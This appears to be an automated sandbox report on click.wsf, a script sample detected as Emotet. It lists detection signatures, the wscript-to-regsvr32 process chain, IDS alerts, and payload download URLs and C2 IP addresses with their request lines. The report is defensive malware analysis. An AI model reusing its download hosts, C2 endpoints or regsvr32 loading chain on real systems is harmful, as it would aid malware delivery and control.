
Windows Analysis Report
click.wsf

Overview

General Information

Sample Name: click.wsf
Analysis ID: 830321
MD5: 016fa961b9af49d75b597c2f61ab344c
SHA1: 2fee0634cfa2988ee8f000724efc1c6c18beef23
SHA256: 8343af0017ad64499072d1485302948a7ad744a638bd2deab301ae108b6b18fd

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 804 cmdline: "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail MD5: CA3FDE8329DE07C95897DB0D828545CD)
  • wscript.exe (PID: 6404 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf" MD5: 563EDAE37876138FDFF47F3E7A9A78FD)
    • regsvr32.exe (PID: 6508 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll MD5: 578BAB56836A3FE455FFC7883041825B)
      • regsvr32.exe (PID: 6544 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll" MD5: 578BAB56836A3FE455FFC7883041825B)
  • cleanup
Name: Emotet
Description: While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid-2018 it has been used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets. It always steals information from victims, but what the criminal gang behind it did was open up another business channel by selling their infrastructure to deliver additional malicious software. Malware analysts have classified it into epochs depending on command and control, payloads, and delivery solutions, which change over time. Emotet was taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
Attribution:
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
Malware configuration (Emotet): C2 list of 48 IP:port entries and two public keys.
Yara matches in memory dumps (Source, Rule, Description, Author, Strings):
Source: 00000001.00000003.1414548751.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp
Rule: webshell_asp_obfuscated (ASP webshell obfuscated), Author: Arnim Rupp
Strings:
  • 0x80c:$tagasp_long20: <script language="VB
  • 0x79f:$asp_payload9: execute "
  • 0xb2:$m_multi_one4: mid(
  • 0x2fb:$m_multi_one4: mid(
  • 0x4c8:$m_multi_one4: mid(
  • 0x6d1:$m_multi_one4: mid(
  • 0xa4c:$m_multi_one4: mid(
Source: 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp
Rule: WEBSHELL_asp_generic (Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file), Author: Arnim Rupp
Strings:
  • 0x312:$asp_gen_obf1: "+"
  • 0x342:$asp_gen_obf1: "+"
  • 0x1bd6:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
  • 0x7a6:$jsp4: public
  • 0xde6:$jsp4: public
  • 0x126:$asp_input1: request
  • 0x954:$asp_input1: request
  • 0x996:$asp_input1: request
  • 0xaac:$asp_input1: request
  • 0x1e96:$asp_input1: request
  • 0x460:$asp_payload11: wscript.shell
  • 0x48:$asp_multi_payload_one1: createobject
  • 0x136:$asp_multi_payload_one1: createobject
  • 0x1ae:$asp_multi_payload_one1: createobject
  • 0x208:$asp_multi_payload_one1: createobject
  • 0x444:$asp_multi_payload_one1: createobject
  • 0xbaa:$asp_multi_payload_one1: createobject
  • 0xee2:$asp_multi_payload_one1: createobject
  • 0x1db8:$asp_multi_payload_one1: createobject
  • 0x1ea6:$asp_multi_payload_one1: createobject
  • 0x1f1e:$asp_multi_payload_one1: createobject
Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp
Rule: webshell_asp_obfuscated (ASP webshell obfuscated), Author: Arnim Rupp
Strings:
  • 0xdea6:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
  • 0x1726:$jsp4: public
  • 0x1d66:$jsp4: public
  • 0x9726:$jsp4: public
  • 0x9d66:$jsp4: public
  • 0xb736:$jsp4: public
  • 0xbd76:$jsp4: public
  • 0xc786:$jsp4: public
  • 0xcdc6:$jsp4: public
  • 0x13e0:$asp_payload11: wscript.shell
  • 0x93e0:$asp_payload11: wscript.shell
  • 0xb3f0:$asp_payload11: wscript.shell
  • 0xc440:$asp_payload11: wscript.shell
  • 0xfc8:$asp_multi_payload_one1: createobject
  • 0x10b6:$asp_multi_payload_one1: createobject
  • 0x112e:$asp_multi_payload_one1: createobject
  • 0x1188:$asp_multi_payload_one1: createobject
  • 0x13c4:$asp_multi_payload_one1: createobject
  • 0x1b2a:$asp_multi_payload_one1: createobject
  • 0x1e62:$asp_multi_payload_one1: createobject
  • 0x8fc8:$asp_multi_payload_one1: createobject
Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp
Rule: WEBSHELL_asp_generic (Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file), Author: Arnim Rupp
Strings:
  • 0x1292:$asp_gen_obf1: "+"
  • 0x12c2:$asp_gen_obf1: "+"
  • 0x9292:$asp_gen_obf1: "+"
  • 0x92c2:$asp_gen_obf1: "+"
  • 0xb2a2:$asp_gen_obf1: "+"
  • 0xb2d2:$asp_gen_obf1: "+"
  • 0xc2f2:$asp_gen_obf1: "+"
  • 0xc322:$asp_gen_obf1: "+"
  • 0xdea6:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
  • 0x1726:$jsp4: public
  • 0x1d66:$jsp4: public
  • 0x9726:$jsp4: public
  • 0x9d66:$jsp4: public
  • 0xb736:$jsp4: public
  • 0xbd76:$jsp4: public
  • 0xc786:$jsp4: public
  • 0xcdc6:$jsp4: public
  • 0x10a6:$asp_input1: request
  • 0x18d4:$asp_input1: request
  • 0x1916:$asp_input1: request
  • 0x1a2c:$asp_input1: request
Source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_Emotet_1 (Yara detected Emotet), Author: Joe Security
    Yara matches in unpacked PE files (Source, Rule, Description, Author, Strings):
    Source: 3.2.regsvr32.exe.460000.0.raw.unpack
    Rule: JoeSecurity_Emotet_1 (Yara detected Emotet), Author: Joe Security
    Source: 3.2.regsvr32.exe.460000.0.unpack
    Rule: JoeSecurity_Emotet_1 (Yara detected Emotet), Author: Joe Security

        Malware Analysis System Evasion

        Source: Process started; Author: Joe Security; Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6404, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll, ProcessId: 6508, ProcessName: regsvr32.exe
        Snort IDS alerts (timestamp, source -> destination, protocol, SID, classtype):
          • 03/20/23-09:07:57.133517  192.168.2.3:49735 -> 187.63.160.88:80  TCP  SID 2404314  A Network Trojan was detected
          • 03/20/23-09:07:41.132019  192.168.2.3:49734 -> 182.162.143.56:443  TCP  SID 2404312  A Network Trojan was detected
          • 03/20/23-09:08:15.086032  192.168.2.3:49738 -> 104.168.155.143:8080  TCP  SID 2404302  A Network Trojan was detected
          • 03/20/23-09:07:19.650620  192.168.2.3:49731 -> 91.121.146.47:8080  TCP  SID 2404344  A Network Trojan was detected
          • 03/20/23-09:08:10.886539  192.168.2.3:49737 -> 164.90.222.65:443  TCP  SID 2404308  A Network Trojan was detected
          • 03/20/23-09:08:05.635641  192.168.2.3:49736 -> 167.172.199.165:8080  TCP  SID 2404310  A Network Trojan was detected
          • 03/20/23-09:07:25.133944  192.168.2.3:49733 -> 66.228.32.31:7080  TCP  SID 2404330  A Network Trojan was detected


        AV Detection

        Source: bbvoyage.com; Virustotal: Detection: 8%
        Source: penshorn.org; Virustotal: Detection: 14%
        Source: www.gomespontes.com.br; Virustotal: Detection: 5%
        Source: C:\Users\user\Desktop\rad75349.tmp.dll; ReversingLabs: Detection: 79%
        Source: C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy); ReversingLabs: Detection: 79%
        Source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Emotet configuration (C2 list of 48 IP:port entries and two public keys)
        Source: unknown; HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.3:49727 version: TLS 1.2
        Source: unknown; HTTPS traffic detected: 31.31.196.172:443 -> 192.168.2.3:49728 version: TLS 1.2
        Source: unknown; HTTPS traffic detected: 186.202.153.5:443 -> 192.168.2.3:49729 version: TLS 1.2
        Source: unknown; HTTPS traffic detected: 164.90.222.65:443 -> 192.168.2.3:49737 version: TLS 1.2
        Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_0000000180008D28 FindFirstFileExW, 3_2_0000000180008D28

        Networking

        Source: C:\Windows\System32\regsvr32.exe; Network Connect: 164.90.222.65 443
        Source: C:\Windows\System32\wscript.exe; Network Connect: 31.31.196.172 443
        Source: C:\Windows\System32\wscript.exe; Network Connect: 186.202.153.5 443
        Source: C:\Windows\System32\wscript.exe; Network Connect: 203.26.41.131 443
        Source: C:\Windows\System32\wscript.exe; Domain query: penshorn.org
        Source: C:\Windows\System32\regsvr32.exe; Network Connect: 66.228.32.31 7080
        Source: C:\Windows\System32\regsvr32.exe; Network Connect: 187.63.160.88 80
        Source: C:\Windows\System32\regsvr32.exe; Network Connect: 104.168.155.143 8080
        Source: C:\Windows\System32\regsvr32.exe; Network Connect: 91.121.146.47 8080
        Source: C:\Windows\System32\regsvr32.exe; Network Connect: 160.16.142.56 8080
        Source: C:\Windows\System32\wscript.exe; Domain query: www.gomespontes.com.br
        Source: C:\Windows\System32\regsvr32.exe; Network Connect: 182.162.143.56 443
        Source: C:\Windows\System32\wscript.exe; Domain query: bbvoyage.com
        Source: C:\Windows\System32\regsvr32.exe; Network Connect: 167.172.199.165 8080
        Source: C:\Windows\System32\regsvr32.exe; Network Connect: 163.44.196.120 8080
        Source: Traffic; Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.3:49731 -> 91.121.146.47:8080
        Source: Traffic; Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.3:49733 -> 66.228.32.31:7080
        Source: Traffic; Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.3:49734 -> 182.162.143.56:443
        Source: Traffic; Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49735 -> 187.63.160.88:80
        Source: Traffic; Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.3:49736 -> 167.172.199.165:8080
        Source: Traffic; Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.3:49737 -> 164.90.222.65:443
        Source: Traffic; Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.3:49738 -> 104.168.155.143:8080
        Source: Malware configuration extractor; IPs: the 48 C2 IP:port entries of the extracted Emotet configuration
        Source: Joe Sandbox View; JA3 fingerprint: 72a589da586844d7f0818ce684948eea
        Source: global traffic; HTTP traffic detected: POST /wfqhlvcfruxkwghn/ivirkxueekmcz/ HTTP/1.1 | Connection: Keep-Alive | Content-Length: 0 | Host: 164.90.222.65
        Source: Joe Sandbox View; IP Address: 52.109.13.63
        Source: global traffic; HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: penshorn.org
        Source: global traffic; HTTP traffic detected: GET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: bbvoyage.com
        Source: global traffic; HTTP traffic detected: GET /logs/pd/ HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: www.gomespontes.com.br
        Source: global traffic; TCP traffic: 192.168.2.3:49731 -> 91.121.146.47:8080
        Source: global traffic; TCP traffic: 192.168.2.3:49733 -> 66.228.32.31:7080
        Source: global traffic; TCP traffic: 192.168.2.3:49736 -> 167.172.199.165:8080
        Source: global traffic; TCP traffic: 192.168.2.3:49738 -> 104.168.155.143:8080
        Source: global traffic; TCP traffic: 192.168.2.3:49739 -> 163.44.196.120:8080
        Source: global traffic; TCP traffic: 192.168.2.3:49740 -> 160.16.142.56:8080
        Source: unknown; Network traffic detected: IP country count 18
        Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 20 Mar 2023 08:06:38 GMT | Server: Apache | X-Powered-By: PHP/7.0.33 | Content-Length: 0 | Connection: close | Content-Type: text/html;charset=utf-8
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertif
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D846725000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: regsvr32.exe, 00000004.00000003.1860943829.0000000000D79000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/
        Source: regsvr32.exe, 00000004.00000003.1860943829.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1863481873.0000000000D78000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com//
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D8466F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ozmeydan.com/cekici/9/
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ozmeydan.com/cekici/9/xM
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
        Source: wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://softwareulike.com/cWIYxWMPkK/_
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
        Source: wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wrappixels.co
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
        Source: wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0
        Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dll
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://104.168.155.143:8080/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://104.168.155.143:8080/4
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://104.168.155.143:8080/P
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://104.168.155.143:8080/Y
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://160.16.142.56:8080/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://160.16.142.56:8080/)
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://160.16.142.56:8080/M
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz//
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://163.44.196.120:8080/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bK
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/z
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://164.90.222.65/)
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://167.172.199.165:8080/
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://167.172.199.165:8080/l
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnX
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLL
